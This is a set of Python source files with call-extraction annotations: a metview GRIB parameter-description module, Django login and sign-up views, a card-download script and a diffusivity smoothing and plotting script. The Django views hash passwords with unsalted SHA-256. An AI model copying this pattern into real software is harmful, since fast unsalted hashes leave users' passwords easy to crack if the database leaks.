        with open(f'tests/data/{set_code}.json', 'w') as out_file:
            json.dump(card_dicts, out_file, indent=4, sort_keys=True)
# Run the download only when executed as a script (not on import).
if __name__ == '__main__':
    main()
| [
"mtgsdk.Card.where",
"json.dump"
] | [((224, 269), 'json.dump', 'json.dump', (['cards', 'f'], {'indent': '(4)', 'sort_keys': '(True)'}), '(cards, f, indent=4, sort_keys=True)\n', (233, 269), False, 'import json\n'), ((130, 151), 'mtgsdk.Card.where', 'mtg.Card.where', ([], {'set': 's'}), '(set=s)\n', (144, 151), True, 'import mtgsdk as mtg\n')] |
# (C) Copyright 2017- ECMWF.
#
# This software is licensed under the terms of the Apache Licence Version 2.0
# which can be obtained at http://www.apache.org/licenses/LICENSE-2.0.
#
# In applying this licence, ECMWF does not waive the privileges and immunities
# granted to it by virtue of its status as an intergovernmental organisation
# nor does it submit to any jurisdiction.
#
import logging
from metview import dataset
import re
import pandas as pd
import metview as mv
from metview.indexer import GribIndexer
# logging.basicConfig(level=logging.INFO, format="%(levelname)s - %(message)s")
# logging.basicConfig(level=logging.DEBUG, format="%(levelname)s - %(message)s")
LOG = logging.getLogger(__name__)
# Original pandas display options saved by init_pandas_options() so they
# can be restored later by reset_pandas_options(); empty means "not saved".
PANDAS_ORI_OPTIONS = {}


def init_pandas_options():
    """Widen pandas display options for table output, saving the originals.

    The previous values are stashed in the module-level PANDAS_ORI_OPTIONS
    so that reset_pandas_options() can restore them.  Calling this again
    while options are already saved is a no-op.
    """
    global PANDAS_ORI_OPTIONS
    if len(PANDAS_ORI_OPTIONS) == 0:
        opt = {
            "display.max_colwidth": 300,
            "display.colheader_justify": "center",
            "display.max_columns": 100,
            "display.max_rows": 500,
            "display.width": None,
        }
        # save current values before overriding (iterate keys directly;
        # the old `for k, _ in opt.items()` discarded the value anyway)
        for k in opt:
            PANDAS_ORI_OPTIONS[k] = pd.get_option(k)
        for k, v in opt.items():
            pd.set_option(k, v)
def reset_pandas_options():
    """Restore the pandas display options saved by init_pandas_options()."""
    global PANDAS_ORI_OPTIONS
    if PANDAS_ORI_OPTIONS:
        for option_key, option_value in PANDAS_ORI_OPTIONS.items():
            pd.set_option(option_key, option_value)
        PANDAS_ORI_OPTIONS = {}
class ParamInfo:
    """A (possibly guessed) parameter name plus the GRIB metadata
    (level, typeOfLevel, ...) identifying it, with helpers to build such
    an object from a textual name or from a fieldset."""

    # name suffix -> GRIB typeOfLevel it implies
    SUFFIXES = {
        "hPa": "isobaricInhPa",
        "hpa": "isobaricInhPa",
        "K": "theta",
        "ml": "hybrid",
    }
    LEVEL_TYPES = {"sfc": "surface", "pl": "isobaricInhPa", "ml": "hybrid"}
    LEVEL_RE = re.compile(r"(\d+)")
    NUM_RE = re.compile(r"[0-9]+")
    SURF_RE = re.compile(r"^\d+\w+")
    # SURF_NAME_MAPPER = {"t2": "2t", "q2": "2q", "u10": "10u", "v10": "10v"}
    KNOWN_SURF_NAMES = ["2t", "2q", "10u", "10v", "msl", "wind10m"]
    VECTOR_NAMES = ["wind10m", "wind3d", "wind"]  # the longest ones first

    def __init__(self, name, meta=None, scalar=None):
        """Store *name*; *scalar* defaults to True and *meta* to
        ``{"shortName": name}`` when not given (or empty)."""
        self.name = name
        self.scalar = scalar if scalar is not None else True
        self.meta = {} if meta is None else meta
        if len(self.meta) == 0:
            self.meta["shortName"] = name

    def make_filter(self):
        """Return a dims dict (values wrapped in single-item lists) that
        selects this parameter by shortName/level/typeOfLevel."""
        dims = {}
        if self.name:
            dims["shortName"] = [self.name]
        for n in ["level", "typeOfLevel"]:
            v = self.meta.get(n, None)
            if v is not None:
                dims[n] = [v]
        return dims

    @staticmethod
    def build_from_name(full_name, param_level_types=None):
        """Parse a textual param name (e.g. "t500", "wind10m", "q2") into a
        ParamInfo, guessing the level and level type from known suffixes.

        Raises Exception when *param_level_types* is given and the guessed
        name or level type is not consistent with it.
        """
        full_name = full_name
        name = full_name
        level = None
        level_type = ""

        # the name is a known param name
        if param_level_types:
            if name in param_level_types:
                lev_t = param_level_types.get(name, [])
                meta = {}
                if len(lev_t) == 1:
                    meta = {"typeOfLevel": lev_t[0], "level": None}
                scalar = not name in ParamInfo.VECTOR_NAMES
                return ParamInfo(name, meta=meta, scalar=scalar)

        t = full_name

        # surface fields
        if t in ParamInfo.KNOWN_SURF_NAMES or ParamInfo.SURF_RE.match(t) is not None:
            level_type = "surface"

        else:
            # guess the level type from the suffix
            for k, v in ParamInfo.SUFFIXES.items():
                if full_name.endswith(k):
                    level_type = v
                    t = full_name[: -(len(k))]
                    break

            # recognise vector params
            for v in ParamInfo.VECTOR_NAMES:
                if t.startswith(v):
                    name = v
                    t = t[len(v) :]
                    break

            # determine level value
            m = ParamInfo.LEVEL_RE.search(t)
            if m and m.groups() and len(m.groups()) == 1:
                level = int(m.group(1))
                # heuristic: a bare numeric level above 10 is taken as a
                # pressure level when no suffix fixed the type
                if level_type == "" and level > 10:
                    level_type = "isobaricInhPa"
            if name == full_name:
                name = ParamInfo.NUM_RE.sub("", t)

        # check param name in the conf
        if param_level_types:
            if not name in param_level_types:
                raise Exception(
                    f"Param={name} (guessed from name={full_name}) is not found in dataset!"
                )

            lev_t = param_level_types.get(name, [])
            if lev_t:
                if not level_type and len(lev_t) == 1:
                    level_type = lev_t[0]
                elif level_type and level_type not in lev_t:
                    raise Exception(
                        f"Level type cannot be guessed from param name={full_name}!"
                    )

        if level_type == "":
            level = None

        scalar = not name in ParamInfo.VECTOR_NAMES
        LOG.debug(f"scalar={scalar}")
        meta = {"level": level, "typeOfLevel": level_type}
        return ParamInfo(name, meta=meta, scalar=scalar)

    @staticmethod
    def build_from_fieldset(fs):
        """Build a ParamInfo by inspecting the first (up to) 3 fields of
        *fs*, recognising the (u, v[, w]) component sequences as the
        synthetic vector params "wind", "wind10m" and "wind3d"."""
        assert isinstance(fs, mv.Fieldset)
        f = fs[0:3] if len(fs) >= 3 else fs
        m = ParamInfo._grib_get(f, GribIndexer.DEFAULT_ECC_KEYS)
        name = ""
        scalar = True
        # vector detection is only valid when, apart from the param name,
        # the metadata agrees across the inspected fields
        meta_same = True
        for x in m.keys():
            if x != "shortName" and m[x].count(m[x][0]) != len(m[x]):
                # BUG FIX: this branch previously assigned an unused
                # variable ("same"), so differing metadata could never
                # disable vector detection
                meta_same = False
                break
        if meta_same:
            if len(m["shortName"]) == 3 and m["shortName"] == ["u", "v", "w"]:
                name = "wind3d"
                scalar = False
            elif len(m["shortName"]) >= 2:
                if m["shortName"][0:2] == ["u", "v"]:
                    name = "wind"
                    scalar = False
                elif m["shortName"][0:2] == ["10u", "10v"]:
                    name = "wind10m"
                    m["level"][0] = 0
                    m["typeOfLevel"][0] = "sfc"
                    scalar = False
        if not name:
            name = m["shortName"][0]

        if name:
            return ParamInfo(name, meta={k: v[0] for k, v in m.items()}, scalar=scalar)
        else:
            return None

    def _meta_match(self, meta, key):
        """True if our metadata value for *key* matches the one in *meta*
        ("levelist" in *meta* is an alias for our "level")."""
        local_key = key if key != "levelist" else "level"
        if (
            key in meta
            and meta[key] is not None
            and meta[key]
            and local_key in self.meta
        ):
            # print(f"local={self.meta[local_key]} other={meta[key]}")
            if isinstance(meta[key], list):
                return str(self.meta[local_key]) in meta[key]
            else:
                return meta[key] == str(self.meta[local_key])
        else:
            return False

    def match(self, name, meta):
        """Score how well this param matches *name* and *meta* (0 = no
        match; the name match alone is worth 3, each metadata key 1)."""
        # print(f"{self}, name={name}, meta={meta}")
        r = 0
        if self.name == name:
            r += 3
        for n in ["shortName", "paramId"]:
            if self._meta_match(meta, n):
                r += 1
        # we only check the rest if the param is ok
        if r > 0:
            if self._meta_match(meta, "typeOfLevel"):
                r += 1
            if self._meta_match(meta, "levelist"):
                r += 1
        return r

    def update_meta(self, meta):
        """Merge *meta* into our metadata; existing local values win."""
        self.meta = {**meta, **self.meta}

    @staticmethod
    def _grib_get(f, keys):
        """Call mv.grib_get for *keys* over fieldset *f* and return
        {key-name: [value per field]}, converting values of ":l" (long)
        keys to ints (None where the conversion fails)."""
        md = mv.grib_get(f, keys, "key")
        m = {}
        for k, v in zip(keys, md):
            key_val = k.split(":")[0]
            val = v
            if k.endswith(":l"):
                val = []
                for x in v:
                    try:
                        val.append(int(x))
                    except:
                        val.append(None)
            m[key_val] = val
        return m

    def __str__(self):
        return "{}[name={}, scalar={}, meta={}]".format(
            self.__class__.__name__, self.name, self.scalar, self.meta
        )
class ParamDesc:
    """Describes one parameter of a dataset: its unique metadata values
    (``md``) and, per typeOfLevel, the list of levels it occurs on
    (``levels``).  Subclasses implement ``load`` to collect the raw
    metadata from a database object."""

    def __init__(self, name):
        # `db` is set by load(); it is expected to offer
        # get_longname_and_units() -- see the long_name/units properties.
        self.db = None
        # self.name = name
        self.md = {}
        self.levels = {}
        # lazily-computed values; None means "not determined yet"
        self._short_name = None
        self._param_id = None
        self._long_name = None
        self._units = None

    def load(self, db):
        """Collect metadata from *db*; implemented by subclasses."""
        raise NotImplementedError

    def _parse(self, md):
        """Digest the raw per-field metadata dict *md* into `self.md`
        (unique values per key) and `self.levels` (levels per
        typeOfLevel)."""
        if "level" in md and len(md["level"]) > 0:
            df = pd.DataFrame(md)
            # level/typeOfLevel are handled separately below
            md.pop("typeOfLevel")
            md.pop("level")
            for md_key in list(md.keys()):
                d = df[md_key].unique().tolist()
                self.md[md_key] = d

            lev_types = df["typeOfLevel"].unique().tolist()

            for t in lev_types:
                # print(f" t={t}")
                self.levels[t] = []
                q = f"typeOfLevel == '{t}'"
                # print(q)
                dft = df.query(q)
                if dft is not None:
                    self.levels[t] = dft["level"].unique().tolist()

    @property
    def short_name(self):
        # first unique shortName, or "" when none was collected
        if self._short_name is None:
            self._short_name = ""
            if self.md["shortName"]:
                self._short_name = self.md["shortName"][0]
        return self._short_name

    @property
    def param_id(self):
        # first unique paramId, or "" when none was collected
        if self._param_id is None:
            self._param_id = ""
            if self.md["paramId"]:
                self._param_id = self.md["paramId"][0]
        return self._param_id

    @property
    def long_name(self):
        # resolved (together with units) via the database on first access
        if self._long_name is None:
            self._long_name = ""
            if self.db is not None:
                self._long_name, self._units = self.db.get_longname_and_units(
                    self.short_name, self.param_id
                )
        return self._long_name

    @property
    def units(self):
        # resolved (together with long_name) via the database on first access
        if self._units is None:
            self._units = ""
            if self.db:
                self._long_name, self._units = self.db.get_longname_and_units(
                    self.short_name, self.param_id
                )
        return self._units

    @staticmethod
    def describe(db, param=None):
        """Describe either all params of *db* (param is None) or a single
        one (param is a shortName str or a paramId int).

        In a Jupyter environment an IPython HTML table is returned;
        otherwise a pandas DataFrame is printed.
        """
        in_jupyter = False
        # mars* keys are shown under their conventional short labels
        labels = {"marsClass": "class", "marsStream": "stream", "marsType": "type"}
        try:
            import IPython

            # test whether we're in the Jupyter environment
            if IPython.get_ipython() is not None:
                in_jupyter = True
        except:
            pass

        # describe all the params
        if param is None:
            t = {"parameter": [], "typeOfLevel": [], "level": []}
            # only show the "number" column when some param has a
            # non-trivial ensemble number
            need_number = False
            for k, v in db.param_meta.items():
                if not v.md.get("number", None) in [["0"], [None]]:
                    need_number = True
                    break

            for k, v in db.param_meta.items():
                t["parameter"].append(k)
                if len(v.levels) > 1:
                    # multiple level types: render them all in one cell
                    lev_type = ""
                    level = ""
                    cnt = 0
                    for md_k, md in v.levels.items():
                        if in_jupyter:
                            lev_type += md_k + "<br>"
                            level += str(ParamDesc.format_list(md)) + "<br>"
                        else:
                            prefix = " " if cnt > 0 else ""
                            lev_type += prefix + f"[{cnt+1}]:" + md_k
                            level += (
                                prefix + f"[{cnt+1}]:" + str(ParamDesc.format_list(md))
                            )
                        cnt += 1
                    t["typeOfLevel"].append(lev_type)
                    t["level"].append(level)
                else:
                    for md_k, md in v.levels.items():
                        t["typeOfLevel"].append(md_k)
                        t["level"].append(ParamDesc.format_list(md))

                for md_k, md in v.md.items():
                    if md_k != "number" or need_number:
                        md_k = labels.get(md_k, md_k)
                        if not md_k in t:
                            t[md_k] = []
                        t[md_k].append(ParamDesc.format_list(md))

            if in_jupyter:
                txt = ParamDesc._make_html_table(t)
                from IPython.display import HTML

                return HTML(txt)
            else:
                df = pd.DataFrame.from_dict(t)
                df = df.set_index(["parameter"])
                init_pandas_options()
                print(df)
        # specific param
        else:
            v = None
            if isinstance(param, str):
                v = db.param_meta.get(param, None)
            elif isinstance(param, int):
                v = db.param_id_meta(param)

            if v is None:
                print(f"No shortName/paramId={param} found in data!")
                return

            # if v is not None:
            # build a two-column key/value table for this single param
            t = {
                "key": ["shortName"],
                "val": [v.short_name],
            }
            if v.long_name != "" or v.units != "":
                t["key"].append("name")
                t["val"].append(v.long_name)
            t["key"].append("paramId")
            t["val"].append(v.param_id)
            # ParamDesc.format_list(v.md["shortName"], full=True),
            if v.long_name != "" or v.units != "":
                t["key"].append("units")
                t["val"].append(v.units)

            # number the typeOfLevel/level rows only when there are several
            add_cnt = len(v.levels) > 1
            cnt = 0
            for md_k, md in v.levels.items():
                t["key"].append("typeOfLevel" + (f"[{cnt+1}]" if add_cnt else ""))
                t["val"].append(md_k)
                t["key"].append("level" + (f"[{cnt+1}]" if add_cnt else ""))
                t["val"].append(ParamDesc.format_list(md, full=True))
                cnt += 1

            for kk, md_v in v.md.items():
                if kk == "number" and md_v == ["0"]:
                    continue
                if not kk in ["shortName", "paramId"]:
                    t["key"].append(labels.get(kk, kk))
                    t["val"].append(ParamDesc.format_list(md_v, full=True))

            if in_jupyter:
                from IPython.display import HTML

                txt = ParamDesc._make_html_table(t, header=False)
                return HTML(txt)
            else:
                df = pd.DataFrame.from_dict(t)
                df = df.set_index("key")
                init_pandas_options()
                print(df)

    @staticmethod
    def _make_html_table(d, header=None):
        """Render dict-of-columns *d* as an HTML table; the first column
        becomes the row headers.  *header* (default True) controls the
        column-name header row."""
        header = header if header is not None else True
        if len(d) > 1:
            first_column_name = list(d.keys())[0]
            txt = """  
        <table>  
        <tr>{}</tr>  
        {}  
        </table>""".format(
                "" if not header else "".join([f"<th>{k}</th>" for k in d.keys()]),
                "".join(
                    [
                        "<tr><th style='text-align: right;'>"
                        + d[first_column_name][i]
                        + "</th>"
                        + "".join(
                            [
                                f"<td style='text-align: left;'>{ParamDesc.format_list(d[k][i], full=True)}</td>"
                                for k in list(d.keys())[1:]
                            ]
                        )
                        + "</tr>"
                        for i in range(len(d[first_column_name]))
                    ]
                ),
            )
            return txt
        else:
            return ""

    @staticmethod
    def format_list(v, full=None):
        """Join list *v* into a comma-separated string; unless *full* is
        True, long lists are abbreviated ("a,b,...") and single-item
        lists return the bare item.  Non-lists pass through unchanged."""
        if isinstance(v, list):
            if full is True:
                return ",".join([str(x) for x in v])
            else:
                if len(v) == 1:
                    return v[0]
                if len(v) > 2:
                    return ",".join([str(x) for x in [v[0], v[1], "..."]])
                else:
                    return ",".join([str(x) for x in v])
        else:
            return v
class ParamNameDesc(ParamDesc):
    """Parameter description keyed by shortName."""

    def __init__(self, name):
        super().__init__(name)
        self._short_name = name

    def load(self, db):
        """Collect metadata for this shortName from *db* and parse it."""
        keys = [
            "typeOfLevel",
            "level",
            "date",
            "time",
            "step",
            "number",
            "paramId",
            "marsClass",
            "marsStream",
            "marsType",
            "experimentVersionNumber",
        ]
        md = {key: [] for key in keys}
        self.db = db
        self.md = {}
        self.levels = {}
        # scalar params live in the "scalar" block and are selected by a
        # query; vector params have a block named after them
        for block_name, block_df in db.blocks.items():
            if block_name == "scalar":
                matching = block_df.query(f"shortName == '{self.short_name}'")
            elif block_name == self.short_name:
                matching = block_df
            else:
                matching = None
            if matching is not None:
                for key in keys:
                    md[key].extend(matching[key].tolist())
        self._parse(md)
class ParamIdDesc(ParamDesc):
    """Parameter description keyed by paramId."""

    def __init__(self, param_id):
        super().__init__("")
        self._param_id = param_id

    def load(self, db):
        """Collect metadata for this paramId from the scalar block of *db*
        and parse it."""
        keys = [
            "shortName",
            "typeOfLevel",
            "level",
            "date",
            "time",
            "step",
            "number",
            "paramId",
            "marsClass",
            "marsStream",
            "marsType",
            "experimentVersionNumber",
        ]
        md = {key: [] for key in keys}
        self.db = db
        self.md = {}
        self.levels = {}
        # only scalar fields are looked up by paramId
        scalar_df = db.blocks.get("scalar", None)
        if scalar_df is not None:
            matching = scalar_df.query(f"paramId == '{self._param_id}'")
            if matching is not None:
                for key in keys:
                    md[key].extend(matching[key].tolist())
        self._parse(md)
| [
"logging.getLogger",
"IPython.get_ipython",
"re.compile",
"pandas.DataFrame.from_dict",
"pandas.set_option",
"metview.grib_get",
"pandas.DataFrame",
"IPython.display.HTML",
"pandas.get_option"
] | [((686, 713), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (703, 713), False, 'import logging\n'), ((1667, 1687), 're.compile', 're.compile', (['"""(\\\\d+)"""'], {}), "('(\\\\d+)')\n", (1677, 1687), False, 'import re\n'), ((1701, 1721), 're.compile', 're.compile', (['"""[0-9]+"""'], {}), "('[0-9]+')\n", (1711, 1721), False, 'import re\n'), ((1737, 1760), 're.compile', 're.compile', (['"""^\\\\d+\\\\w+"""'], {}), "('^\\\\d+\\\\w+')\n", (1747, 1760), False, 'import re\n'), ((7416, 7443), 'metview.grib_get', 'mv.grib_get', (['f', 'keys', '"""key"""'], {}), "(f, keys, 'key')\n", (7427, 7443), True, 'import metview as mv\n'), ((1134, 1150), 'pandas.get_option', 'pd.get_option', (['k'], {}), '(k)\n', (1147, 1150), True, 'import pandas as pd\n'), ((1196, 1215), 'pandas.set_option', 'pd.set_option', (['k', 'v'], {}), '(k, v)\n', (1209, 1215), True, 'import pandas as pd\n'), ((1372, 1391), 'pandas.set_option', 'pd.set_option', (['k', 'v'], {}), '(k, v)\n', (1385, 1391), True, 'import pandas as pd\n'), ((8402, 8418), 'pandas.DataFrame', 'pd.DataFrame', (['md'], {}), '(md)\n', (8414, 8418), True, 'import pandas as pd\n'), ((10348, 10369), 'IPython.get_ipython', 'IPython.get_ipython', ([], {}), '()\n', (10367, 10369), False, 'import IPython\n'), ((12340, 12349), 'IPython.display.HTML', 'HTML', (['txt'], {}), '(txt)\n', (12344, 12349), False, 'from IPython.display import HTML\n'), ((12389, 12414), 'pandas.DataFrame.from_dict', 'pd.DataFrame.from_dict', (['t'], {}), '(t)\n', (12411, 12414), True, 'import pandas as pd\n'), ((14324, 14333), 'IPython.display.HTML', 'HTML', (['txt'], {}), '(txt)\n', (14328, 14333), False, 'from IPython.display import HTML\n'), ((14373, 14398), 'pandas.DataFrame.from_dict', 'pd.DataFrame.from_dict', (['t'], {}), '(t)\n', (14395, 14398), True, 'import pandas as pd\n')] |
from hashlib import sha256
from django.http import HttpResponse
from django.shortcuts import redirect, render
from .models import Usuarios
def login(request):
    """Show the login form; users with an active session go straight home."""
    if request.session.get('usuario'):
        return redirect('/livro/home/')
    return render(request, 'login.html', {'status': request.GET.get('status')})
def cadastro(request):
    """Show the sign-up form; users with an active session go straight home."""
    if request.session.get('usuario'):
        return redirect('/livro/home/')
    return render(request, 'cadastro.html', {'status': request.GET.get('status')})
def valida_cadastro(request):
    """Validate the sign-up form and create the user.

    Redirects back to the sign-up page with a status code:
      1 - empty name or e-mail, 2 - password shorter than 8 characters,
      3 - e-mail already registered, 4 - unexpected failure, 0 - success.
    """
    nome = request.POST.get('nome')
    senha = request.POST.get('senha')
    email = request.POST.get('email')

    usuario = Usuarios.objects.filter(email=email)

    if len(nome.strip()) == 0 or len(email.strip()) == 0:
        return redirect('/auth/cadastro/?status=1')

    if len(senha) < 8:
        return redirect('/auth/cadastro/?status=2')

    if len(usuario) > 0:
        # BUG FIX: this URL previously read '/auth/cadatro/...' (missing
        # the 's'), redirecting duplicate e-mails to a non-existent route.
        return redirect('/auth/cadastro/?status=3')

    try:
        # store only the SHA-256 digest of the password
        senha = sha256(senha.encode()).hexdigest()
        usuario = Usuarios(
            nome=nome,
            email=email,
            senha=senha,
        )
        usuario.save()
        return redirect('/auth/cadastro/?status=0')
    except Exception:
        # catch Exception (not a bare except) so system-exiting exceptions
        # still propagate; report a generic failure to the user
        return redirect('/auth/cadastro/?status=4')
def validar_login(request):
    """Authenticate the user; on success store the user id in the session.

    Redirects to the login page with status=1 on bad credentials, or to
    the home page after a successful login.
    """
    email = request.POST.get('email')
    senha = request.POST.get('senha')
    # compare against the stored SHA-256 digest
    senha = sha256(senha.encode()).hexdigest()

    usuario = Usuarios.objects.filter(email=email).filter(senha=senha)

    if len(usuario) == 0:
        return redirect('/auth/login/?status=1')
    # at least one match: log the first matching user in.
    # (The previous version ended with an unreachable
    # HttpResponse(f"{email} {senha}") debug leftover -- both branches of
    # the if/elif returned -- which would have echoed credentials; removed.)
    request.session['usuario'] = usuario[0].id
    return redirect('/livro/home/')
def sair(request):
    """Log out: discard all session data and return to the login page."""
    request.session.flush()
    return redirect('/auth/login/')
| [
"django.shortcuts.render",
"django.http.HttpResponse",
"django.shortcuts.redirect"
] | [((297, 346), 'django.shortcuts.render', 'render', (['request', '"""login.html"""', "{'status': status}"], {}), "(request, 'login.html', {'status': status})\n", (303, 346), False, 'from django.shortcuts import redirect, render\n'), ((505, 557), 'django.shortcuts.render', 'render', (['request', '"""cadastro.html"""', "{'status': status}"], {}), "(request, 'cadastro.html', {'status': status})\n", (511, 557), False, 'from django.shortcuts import redirect, render\n'), ((1765, 1797), 'django.http.HttpResponse', 'HttpResponse', (['f"""{email} {senha}"""'], {}), "(f'{email} {senha}')\n", (1777, 1797), False, 'from django.http import HttpResponse\n'), ((1858, 1882), 'django.shortcuts.redirect', 'redirect', (['"""/auth/login/"""'], {}), "('/auth/login/')\n", (1866, 1882), False, 'from django.shortcuts import redirect, render\n'), ((217, 241), 'django.shortcuts.redirect', 'redirect', (['"""/livro/home/"""'], {}), "('/livro/home/')\n", (225, 241), False, 'from django.shortcuts import redirect, render\n'), ((425, 449), 'django.shortcuts.redirect', 'redirect', (['"""/livro/home/"""'], {}), "('/livro/home/')\n", (433, 449), False, 'from django.shortcuts import redirect, render\n'), ((830, 866), 'django.shortcuts.redirect', 'redirect', (['"""/auth/cadastro/?status=1"""'], {}), "('/auth/cadastro/?status=1')\n", (838, 866), False, 'from django.shortcuts import redirect, render\n'), ((906, 942), 'django.shortcuts.redirect', 'redirect', (['"""/auth/cadastro/?status=2"""'], {}), "('/auth/cadastro/?status=2')\n", (914, 942), False, 'from django.shortcuts import redirect, render\n'), ((984, 1019), 'django.shortcuts.redirect', 'redirect', (['"""/auth/cadatro/?status=3"""'], {}), "('/auth/cadatro/?status=3')\n", (992, 1019), False, 'from django.shortcuts import redirect, render\n'), ((1231, 1267), 'django.shortcuts.redirect', 'redirect', (['"""/auth/cadastro/?status=0"""'], {}), "('/auth/cadastro/?status=0')\n", (1239, 1267), False, 'from django.shortcuts import redirect, render\n'), 
((1600, 1633), 'django.shortcuts.redirect', 'redirect', (['"""/auth/login/?status=1"""'], {}), "('/auth/login/?status=1')\n", (1608, 1633), False, 'from django.shortcuts import redirect, render\n'), ((1295, 1331), 'django.shortcuts.redirect', 'redirect', (['"""/auth/cadastro/?status=4"""'], {}), "('/auth/cadastro/?status=4')\n", (1303, 1331), False, 'from django.shortcuts import redirect, render\n'), ((1727, 1752), 'django.shortcuts.redirect', 'redirect', (['f"""/livro/home/"""'], {}), "(f'/livro/home/')\n", (1735, 1752), False, 'from django.shortcuts import redirect, render\n')] |
import matplotlib
matplotlib.use("Agg")
from matplotlib import pyplot as plt
import numpy as np
import os
from nanopores.tools import fields
from scipy.interpolate import interp1d
# Cached field data lives under ~/Dropbox/nanopores/fields; point the fields
# module there before any lookup.
HOME = os.path.expanduser("~")
DATADIR = os.path.join(HOME, "Dropbox", "nanopores", "fields")
fields.set_dir(DATADIR)
# Precomputed diffusivity field sampled on the "pugh" pore cross-section
# (rMolecule=2.0779 — units per the nanopores convention, presumably nm; confirm).
data = fields.get_fields("pugh_diff3D_cross", bulkbc=True, rMolecule=2.0779)
def smooth3(l):
    """Smooth a 1D sequence with a centered 3-point moving average.

    The first and last entries are left unchanged because the full kernel
    does not fit there.

    inputs:
        l: sequence of numbers
    outputs:
        list of floats, same length as the input
    """
    # Force float so integer inputs are not silently truncated on assignment.
    A = np.array(l, dtype=float)
    # A true copy is required: A[:] on a numpy array is only a VIEW, so writing
    # into it would feed already-smoothed values back into the kernel below.
    B = A.copy()
    ker = np.array([1./3, 1./3, 1./3])
    n = int(ker.shape[0]/2.)
    for i in range(n, A.shape[0]-n):
        B[i] = np.inner(A[i-n:i+n+1], ker)
    return list(B)
def smooth5(l):
    """Smooth a 1D sequence with a centered 5-point moving average.

    The two entries at each end are left unchanged because the full kernel
    does not fit there.

    inputs:
        l: sequence of numbers
    outputs:
        list of floats, same length as the input
    """
    # Force float so integer inputs are not silently truncated on assignment.
    A = np.array(l, dtype=float)
    # A true copy is required: A[:] on a numpy array is only a VIEW, so writing
    # into it would feed already-smoothed values back into the kernel below.
    B = A.copy()
    ker = np.array([.2, .2, .2, .2, .2])
    n = int(ker.shape[0]/2.)
    for i in range(n, A.shape[0]-n):
        B[i] = np.inner(A[i-n:i+n+1], ker)
    return list(B)
def smootha(l):
    """Smooth a 1D sequence with a centered, normalized 5-point weighted kernel.

    Kernel weights [10, 12, 15, 12, 10] are normalized to sum to 1. The two
    entries at each end are left unchanged because the full kernel does not
    fit there.

    inputs:
        l: sequence of numbers
    outputs:
        list of floats, same length as the input
    """
    # Force float so integer inputs are not silently truncated on assignment.
    A = np.array(l, dtype=float)
    # A true copy is required: A[:] on a numpy array is only a VIEW, so writing
    # into it would feed already-smoothed values back into the kernel below.
    B = A.copy()
    ker = np.array([10., 12., 15., 12., 10.])
    ker = ker/np.sum(ker)
    n = int(ker.shape[0]/2.)
    for i in range(n, A.shape[0]-n):
        B[i] = np.inner(A[i-n:i+n+1], ker)
    return list(B)
# First coordinate of each sample point; the plot labels this axis as the
# distance from the pore center [nm].
x = [z[0] for z in data["x"]]
data, x = fields._sorted(data, x)
# Extend the abscissa up to 1 plus a few eps-spaced points so the padded
# profiles below pin the interpolants to zero there (presumably the pore
# wall — TODO confirm the geometry).
eps=5e-3
x_=x[:]
#x_.extend([1.,1.+eps,1.+2*eps,1.+3*eps])
x.extend([(x[-1]+1.)/2.,1.,1.+eps,1.+2*eps,1.+3*eps,1.+4*eps,1.+5*eps])
# Subscript labels used in the legend ($D_{xx}$, $D_{yy}$, $D_{zz}$).
dstr = ["x", "y", "z"]
# Diagonal entries of the sampled diffusivity tensors.
Dxx = [D[0][0] for D in data["D"]]
Dyy = [D[1][1] for D in data["D"]]
Dzz = [D[2][2] for D in data["D"]]
# Unpadded copies, kept for the dotted reference curves in the plot.
Dxx_ = [D[0][0] for D in data["D"]]
Dyy_ = [D[1][1] for D in data["D"]]
Dzz_ = [D[2][2] for D in data["D"]]
# Zero-pad at the added abscissa points (with one intermediate half value
# for Dyy/Dzz) so the profiles decay instead of extrapolating.
Dxx.extend([0.,0.,0.,0.,0.,0.,0.])
Dyy.extend([Dyy[-1]/2.,0.,0.,0.,0.,0.,0.])
Dzz.extend([Dzz[-1]/2.,0.,0.,0.,0.,0.,0.])
#Dxx_.extend([0.,0.,0.,0.])
#Dyy_.extend([0.,0.,0.,0.])
#Dzz_.extend([0.,0.,0.,0.])
# Smooth the padded profiles: a 3-point pass followed by a 5-point pass.
Dxx=smooth5(smooth3(Dxx))
Dyy=smooth5(smooth3(Dyy))
Dzz=smooth5(smooth3(Dzz))
# Piecewise-linear interpolants of the smoothed diffusivity profiles.
Dx = interp1d(x,Dxx)
Dy = interp1d(x,Dyy)
Dz = interp1d(x,Dzz)
# Central-difference derivatives of the profiles, clamped to zero at both ends.
DDxx = [0.]+[(Dxx[i+1]-Dxx[i-1])/(x[i+1]-x[i-1]) for i in range(1,len(x)-1)]+[0.]
DDyy = [0.]+[(Dyy[i+1]-Dyy[i-1])/(x[i+1]-x[i-1]) for i in range(1,len(x)-1)]+[0.]
DDzz = [0.]+[(Dzz[i+1]-Dzz[i-1])/(x[i+1]-x[i-1]) for i in range(1,len(x)-1)]+[0.]
# Interpolants of the derivatives.
dDx = interp1d(x,DDxx)
dDy = interp1d(x,DDyy)
dDz = interp1d(x,DDzz)
if __name__=='__main__':
    # Evaluation grid for the interpolated curves (pore interior, 0..1).
    xc=np.linspace(0.,1.,100)
    # D_xx in blue: raw samples (dotted line + markers), padded samples,
    # smoothed interpolant, and its derivative curve.
    plt.plot(x_,Dxx_,color='blue',linestyle=':')
    plt.scatter(x_,Dxx_,color='blue')
    plt.scatter(x,Dxx,color='blue')
    #plt.plot(x,Dxx,color='blue')
    plt.plot(xc,Dx(xc),color='blue',label=r"$D_{%s%s}$" % (dstr[0], dstr[0]))
    plt.scatter(x,DDxx,color='blue')
    #plt.plot(x,DDxx,color='blue')
    plt.plot(xc,dDx(xc),color='blue')
    # D_yy in red, same layout.
    plt.plot(x_,Dyy_,color='red',linestyle=':')
    plt.scatter(x_,Dyy_,color='red')
    plt.scatter(x,Dyy,color='red')
    #plt.plot(x,Dyy,color='red')
    plt.plot(xc,Dy(xc),color='red',label=r"$D_{%s%s}$" % (dstr[1], dstr[1]))
    plt.scatter(x,DDyy,color='red')
    #plt.plot(x,DDyy,color='red')
    plt.plot(xc,dDy(xc),color='red')
    # D_zz in green, same layout.
    plt.plot(x_,Dzz_,color='green',linestyle=':')
    plt.scatter(x_,Dzz_,color='green')
    plt.scatter(x,Dzz,color='green')
    #plt.plot(x,Dzz,color='green')
    plt.plot(xc,Dz(xc),color='green',label=r"$D_{%s%s}$" % (dstr[2], dstr[2]))
    plt.scatter(x,DDzz,color='green')
    #plt.plot(x,DDzz,color='green')
    plt.plot(xc,dDz(xc),color='green')
    plt.xlabel('distance from pore center [nm]')
